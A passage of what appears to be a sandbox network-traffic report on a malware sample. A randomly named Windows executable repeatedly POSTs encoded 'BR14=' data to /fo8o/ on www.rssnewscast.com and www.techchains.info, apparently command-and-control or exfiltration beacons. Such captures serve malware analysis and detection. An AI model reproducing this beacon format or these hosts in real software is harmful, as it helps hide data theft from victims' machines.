61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.9	49724	91.195.240.94	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:30:51.253907919 CET	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 67 51 38 74 69 48 61 42 42 6c 4c 4c 58 79 79 50 68 6e 4a 6e 52 69 69 39 2f 7a 66 57 66 67 30 61 4e 76 71 77 6a 4c 6d 65 78 48 2b 70 30 7a 34 48 36 49 55 46 71 59 38 42 31 44 57 54 6c 6c 41 6c 58 30 4c 33 49 66 70 41 73 4b 33 56 6c 4b 63 58 39 55 45 2b 4d 67 55 6c 30 47 53 6f 6f 7a 54 48 33 54 5a 33 30 6c 32 4b 53 4b 74 45 45 6e 37 4b 4c 50 73 35 69 53 67 64 78 49 55 4d 4d 45 38 67 59 42 33 72 47 73 38 53 72 35 47 42 7a 79 79 48 51 2b 51 48 6d 4e 4b 69 73 64 33 61 57 72 70 4d 75 51 36 78 53 50 4d 41 3d 3d Data Ascii: BR14=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMgQ8tiHaBBlLLXyyPhnJnRii9/zfWfg0aNvqwjLmexH+p0z4H6IUFqY8B1DWTllAlX0L3IfpAsK3VlKcX9UE+MgUl0GSoozTH3TZ30l2KSKtEEn7KLPs5iSgdxIUMME8gYB3rGs8Sr5GBzyyHQ+QHmNKisd3aWrpMuQ6xSPMA==
Dec 31, 2024 09:30:51.895385027 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 31 Dec 2024 08:30:51 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.9	49725	91.195.240.94	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:30:53.785846949 CET	1807	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.rssnewscast.com Origin: http://www.rssnewscast.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.rssnewscast.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 38 31 4c 31 38 78 65 33 79 6e 4b 77 58 65 45 4f 71 53 73 50 41 43 72 56 78 6e 41 41 72 4b 54 56 6e 45 52 72 65 35 69 48 47 4d 6f 51 38 34 2b 48 61 69 70 6c 4d 4c 58 79 74 2f 68 6d 4a 6e 52 46 69 39 48 2f 66 57 43 56 30 66 4a 76 73 52 44 4c 78 36 6c 48 31 70 30 7a 6c 58 36 4e 4d 6c 71 33 38 42 45 49 57 58 46 6c 41 6c 58 30 4c 32 34 66 73 68 73 4b 78 56 6c 4a 66 58 39 41 41 2b 4d 49 55 68 5a 39 53 6f 39 49 54 7a 44 54 61 58 6b 6c 31 34 71 4b 76 6b 45 6c 34 4b 4c 48 73 35 75 52 67 64 73 35 55 4d 34 75 38 69 59 42 31 64 62 75 6d 32 33 67 59 51 33 54 2f 58 6f 6c 49 7a 6d 6f 4b 79 67 64 33 61 76 52 31 66 47 45 79 69 66 6e 59 69 4f 6d 6c 67 4e 56 52 65 68 4f 31 36 35 63 4f 37 32 6c 69 68 4e 46 4c 78 6b 59 43 6a 56 6b 52 78 4d 79 6c 4c 70 48 69 2f 7a 71 65 4a 48 49 31 64 75 30 31 42 36 61 46 56 45 43 2b 47 4b 39 57 4a 55 36 67 59 4a 55 4f 65 63 43 6a 7a 4b 2b 73 77 43 37 61 79 62 38 5a 6d 48 5a 65 4a 2f 34 4f 53 53 44 72 58 4f 71 52 44 79 73 57 66 4e 33 69 72 64 62 46 68 52 78 48 61 73 64 47 [TRUNCATED] Data Ascii: BR14=81L18xe3ynKwXeEOqSsPACrVxnAArKTVnERre5iHGMoQ84+HaiplMLXyt/hmJnRFi9H/fWCV0fJvsRDLx6lH1p0zlX6NMlq38BEIWXFlAlX0L24fshsKxVlJfX9AA+MIUhZ9So9ITzDTaXkl14qKvkEl4KLHs5uRgds5UM4u8iYB1dbum23gYQ3T/XolIzmoKygd3avR1fGEyifnYiOmlgNVRehO165cO72lihNFLxkYCjVkRxMylLpHi/zqeJHI1du01B6aFVEC+GK9WJU6gYJUOecCjzK+swC7ayb8ZmHZeJ/4OSSDrXOqRDysWfN3irdbFhRxHasdGJ8fHmgRUQ7q75bPSfk5DUYG9UBoGdi8/mF/xbb5iSBE5JY12dA9aYXe5DGaUCD9a4C2fei4rNKdGN+BuOOAs4Lkir5hC28h2VCW7N63dm4PkACzu1ABunaNscL+QtWzR0nRbjK8h1wMNNZK1kvc/mwlEQqVN8sDqCclvTEA8PQZDkUqYvAt6bc2uMPldWMDMMjWKljpN+f43+WYphYD3frJIA07OfQD7qkklIn9A7m9F+97DMSJAUaztAjPdhRkUprNEZ0lx/4KDW3FzPEkIRyK1ay8+h0/DhtBP5wVdiGMZSfwbUdjQBOQWPJD2EsRPeS+o0mZnRUDmlvf2jzcm3zg5KZsa1Co+krN88UOq7PSV9IS9yGS9dWzkE28j6aUwW3VuE34YDrgP/9P7Q86Ie2t+fgb6ny3H8aMdt9szpOnAPv/it4V9yA4ncSaPiob8lsR4jMFEZDtFjV17Itvwz7p2mqeh94AUJ2Imx6DnUGhDM5pJTI25y0jfTmBYk/SaHRs8CGiNEa6Wmr1dk9xZNTb6oibQ4E7NJsUgRtQ1J0qW9hXkaHbofjzX71/d/Cn4gHitN9szMm4jR37jUNeheg1WHZXC3F60FvseM+r5P1cll85n/8qsZDQq7Jrl3NyIQB3n5lvJv3Ypek5QdjUQzHjR9gnS8s61bQ [TRUNCATED]
Dec 31, 2024 09:30:54.541626930 CET	707	IN	HTTP/1.1 405 Not Allowed date: Tue, 31 Dec 2024 08:30:54 GMT content-type: text/html content-length: 556 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED] Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.9	49726	91.195.240.94	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:30:56.318869114 CET	502	OUT	GET /fo8o/?BR14=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&D0=YnO0xF1X40 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.rssnewscast.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Dec 31, 2024 09:30:56.982919931 CET	1236	IN	HTTP/1.1 200 OK date: Tue, 31 Dec 2024 08:30:56 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5lCX+k7E4ag3ws7GrKSR4y0ub7OpYi5atw8bqxFj6kQArVgm40mHmHhScbwYLly9q3ktU7vyZ1ulg0y/lf70Q== last-modified: Tue, 31 Dec 2024 08:30:56 GMT x-cache-miss-from: parking-7df97dc48-47dkv server: Parking/1.0 connection: close Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 6d 35 6c 43 58 2b 6b 37 45 34 61 67 33 77 73 37 47 72 4b 53 52 34 79 30 75 62 37 4f 70 59 69 35 61 74 77 38 62 71 78 46 6a 36 6b 51 41 72 56 67 6d 34 30 6d 48 6d 48 68 53 63 62 77 59 4c 6c 79 39 71 33 6b 74 55 37 76 79 5a 31 75 6c 67 30 79 2f 6c 66 37 30 51 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 73 73 6e 65 77 73 63 61 73 74 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 73 73 6e [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5lCX+k7E4ag3ws7GrKSR4y0ub7OpYi5atw8bqxFj6kQArVgm40mHmHhScbwYLly9q3ktU7vyZ1ulg0y/lf70Q==><head><meta charset="utf-8"><title>rssnewscast.com - rssnewscast Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="rssnewscast.com is your first and best source for all of the informatio
Dec 31, 2024 09:30:56.982938051 CET	1236	IN	Data Raw: 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 Data Ascii: n youre looking for. From general topics to more of what you would expect to find here, rssnewscast.com has it all. We hope you find what you are searchi1062ng for!"><link rel="icon" type="image/png" href="//img.
Dec 31, 2024 09:30:56.982947111 CET	448	IN	Data Raw: 6e 65 2d 68 65 69 67 68 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 30 2e 32 35 65 6d 7d 73 75 70 7b 74 6f 70 3a 2d Data Ascii: ne-height:0;position:relative;vertical-align:baseline}sub{bottom:-0.25em}sup{top:-0.5em}audio,video{display:inline-block}audio:not([controls]){display:none;height:0}img{border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,sel
Dec 31, 2024 09:30:56.982956886 CET	1236	IN	Data Raw: 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 5b 74 79 70 65 3d 72 65 73 65 Data Ascii: earance:button}button::-moz-focus-inner,[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[
Dec 31, 2024 09:30:56.982968092 CET	1236	IN	Data Raw: 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e Data Ascii: content{color:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat center top;background-size:100%}.container-content__container-re
Dec 31, 2024 09:30:56.982980013 CET	1236	IN	Data Raw: 6e 65 3b 63 6f 6c 6f 72 3a 23 30 61 34 38 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a Data Ascii: ne;color:#0a48ff}.two-tier-ads-list__list-element-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:576#0a48ff}.two-tier-ads-list__list-e
Dec 31, 2024 09:30:56.982989073 CET	1236	IN	Data Raw: 2d 73 69 7a 65 3a 31 32 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 39 31 39 64 61 36 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e Data Ascii: -size:12px}.container-buybox__content-link{color:#919da6}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searchbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-fami
Dec 31, 2024 09:30:56.982999086 CET	1236	IN	Data Raw: 2d 62 6c 6f 63 6b 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 70 72 69 76 61 63 79 50 6f 6c 69 63 79 5f 5f 63 6f 6e 74 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 63 6f 6c 6f 72 3a 23 35 35 35 7d 2e 63 6f 6e 74 61 69 6e 65 72 Data Ascii: -block}.container-privacyPolicy__content-link{font-size:10px;color:#555}.container-cookie-message{position:fixed;bottom:0;width:100%;background:#5f5f5f;font-size:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text
Dec 31, 2024 09:30:56.983011961 CET	1236	IN	Data Raw: 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6c 6f 73 65 7b 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 Data Ascii: cookie-modal-window__close{width:100%;margin:0}.cookie-modal-window__content-body table{width:100%;border-collapse:collapse}.cookie-modal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{backg
Dec 31, 2024 09:30:56.983022928 CET	1236	IN	Data Raw: 30 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 7d 2e 73 77 69 74 63 68 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 36 30 70 78 3b 68 65 69 67 68 Data Ascii: 0;width:0;height:0}.switch{position:relative;display:inline-block;width:60px;height:34px}.switch__slider{position:absolute;cursor:pointer;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__sli
Dec 31, 2024 09:30:56.988012075 CET	1236	IN	Data Raw: 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 22 2c 22 61 64 62 6c 6f 63 6b 6b 65 79 22 3a 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c Data Ascii: oparking.com","adblockkey":" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_m5lCX+k7E4ag3ws7GrKSR4y0ub7OpYi5atw8bqxFj6kQArVgm40mHmHhScbwYLly9q3kt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.9	49727	66.29.149.46	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:10.286083937 CET	770	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 4a 73 72 71 61 53 64 72 63 68 63 50 52 57 46 59 34 57 4d 76 6b 43 39 6e 39 47 5a 2b Data Ascii: BR14=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXJsrqaSdrchcPRWFY4WMvkC9n9GZ+
Dec 31, 2024 09:31:10.885308981 CET	637	IN	HTTP/1.1 404 Not Found Date: Tue, 31 Dec 2024 08:31:10 GMT Server: Apache Content-Length: 493 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.9	49728	66.29.149.46	80	3852	C:\Program Files (x86)\tAumOGNztmKjBOhxUDthMJDWZRkLqisWfBPZFXRxHNIYbXLXFECKFqFVygmmzySNmblwteBsruUko\YtGWSBzTzAeRZwtsgUUux.exe

Timestamp	Bytes transferred	Direction	Data
Dec 31, 2024 09:31:12.815418005 CET	794	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.techchains.info Origin: http://www.techchains.info Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.techchains.info/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 42 52 31 34 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 39 41 36 68 51 57 76 62 6a 41 46 57 58 33 2b 34 52 52 52 74 48 4a 58 4a 50 64 67 77 3d 3d Data Ascii: 